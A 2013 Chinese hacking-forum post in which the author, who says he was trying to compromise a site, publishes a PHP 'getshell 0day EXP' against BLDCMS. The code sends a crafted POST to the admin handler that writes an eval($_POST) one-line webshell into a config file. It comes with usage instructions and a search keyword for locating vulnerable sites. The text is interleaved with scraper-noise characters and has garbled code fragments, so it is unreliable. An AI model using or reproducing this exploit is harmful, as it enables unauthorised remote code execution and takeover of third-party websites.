之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
% B7 [; u H4 f
% _% L; q- M: H4 r 1 a- ~* ]& \+ w, F x! |; W4 f. N
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 8 H: A& i5 M) a- w, e
1 Z1 U( v7 o/ N既然都有人发了 我就把我之前写好的EXP放出来吧8 }" \( I% ], _8 M
0 \3 Z2 s( n8 P2 p9 tview source print?01.php;">
: M0 J7 _' @: e6 x( T# P6 }3 V02.<!--?php
, C5 K1 n* j) q) m03.echo "-------------------------------------------------------------------( z- G1 Y3 E0 C6 @" c6 K1 U
04. $ i6 |& U2 R& p1 n, Y- k8 N( F% f
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
" g Q7 K* H" q: O6 m06.
9 n- E. }. w) b2 W- `07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun: b+ c" K! r. u1 j; i! D8 j
08.
1 B8 @' I ^: H- M5 [" @- A+ W09.QQ:981009941\r\n 2013.3.21\r\n
" Z, D; K+ f' p, G10.
J) w8 Q( {# c) n11.
. `6 q, `$ L% h2 U# s) c0 l1 w12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
7 U- h% N5 `6 p; Y) Y, r13.
0 a& j, ~2 c. }9 S' ^. S/ b6 n3 x% E9 B14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
3 {! ]- F. l# t7 L* A. N/ N, X15.
9 }+ M2 ]7 y) i1 r% {0 N, \16.--------------------------------------------------------------------\r\n";+ c: e) ?$ F& T! @4 z0 [2 x/ r5 e
17.$url=$argv[1];
) x- K4 t% u) `: L18.$dir=$argv[2];
: m8 z7 S2 a1 ~2 h4 C: U19.$pass=$argv[3];
% [7 P* T4 @, U7 b20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
d, X4 |$ G7 S21.if (emptyempty($pass)||emptyempty($url))
# p7 e$ V p/ ]+ k22.{exit("请输入参数");}
7 a h6 E* _; j) [9 R: S4 A( m( a' j23.else
/ t4 v* ^ B3 Z" c24.{
& Z+ @. X7 g9 M7 \25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev5 E8 o8 E3 }, c0 J. o( M
26. ( H5 v2 W5 k5 e) a$ Z( G& \; M
27.al;+ |1 ]! {4 X P0 J5 W$ \. `' e* I
28.$length = strlen($fuckdata);! q% W* ^ V" L4 z, a' a, n
29.function getshell($url,$pass)
6 b! F6 ]: E9 {( Q; J" [30.{7 i2 j4 V: L$ Y6 c/ f& s, J
31.global $url,$dir,$pass,$eval,$length,$fuckdata;# C( _( H: Q- r1 d% L6 a
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
+ i# ?# ]% P1 f7 t3 T9 _33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
& V& T9 ~' d: @8 F" e34.$header .= "User-Agent: MSIE\r\n";9 w# E7 {0 k1 L! g- T
35.$header .= "Host:".$url."\r\n";
* q4 ?7 c! y- A& X4 i. ^2 l; b9 X36.$header .= "Content-Length: ".$length."\r\n";/ c$ t" B: \) G+ W4 j6 K9 \$ r5 ^$ \
37.$header .= "Connection: Close\r\n";7 ? j, u" N4 r \5 L$ W
38.$header .="\r\n";' y/ K j$ }2 Z# \
39.$header .= $fuckdata."\r\n\r\n";
0 k ~, w! n. `2 d7 c' v5 }$ v40.$fp = fsockopen($url, 80,$errno,$errstr,15);
$ v' Z# Q0 B* V0 i41.if (!$fp)4 U# k$ P6 [9 ?( Z2 `2 O& p t
42.{
% ?/ m4 N% `' N, k' h; }/ j43.exit ("利用失败:请检查指定目标是否能正常打开");
( t9 D; |) m! |* d- g. U$ E4 H44.}: h$ T4 b `* p6 [7 m7 B+ y; J) k
45.else{ if (!fputs($fp,$header))
' X- _# g! i @8 y+ a46.{exit ("利用失败");}
1 l7 Z& W. I+ c) c3 E0 o) R47.else
6 l/ t- C2 Q3 k48.{
3 b! s; y7 d! {8 p" [# h) I49.$receive = '';# i% n3 Q" p% Y+ ?4 f
50.while (!feof($fp)) {: `) M# l N+ ~, Q# [
51.$receive .= @fgets($fp, 1000);8 `# B; o1 p+ J9 Y# d& s
52.}
3 c) A$ M" f5 Q+ g# q) s53.@fclose($fp);; A! ]. B* I" f% ?; K$ \1 p+ O p
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
# D2 [& E4 J( ~2 g. Y55.
9 J: u5 v9 M; } [56.GPC是否=off)";
" ]- u2 K! Q5 ?2 e57.}}1 l3 M7 C( Y6 J( r
58.}, V- }, u* _' ]; k, g( r: J5 P! b
59.} U( ?7 _- Y4 g: `8 R
60.getshell($url,$pass);
, J% g+ R6 P" w8 w' O) d/ Q61.?-->; ^9 n d- |+ b% s0 W6 m Y+ P
0 [7 ]7 r) Y2 A
# Z- w' q' _% M0 r3 W6 Z3 h. I# x 0 T" k0 Q0 J* E b1 M& A9 v1 x
by 数据流& q1 ^# f; b" Q9 x5 g
|
发表于 2013-3-26 20:49:10
收藏
支持
反对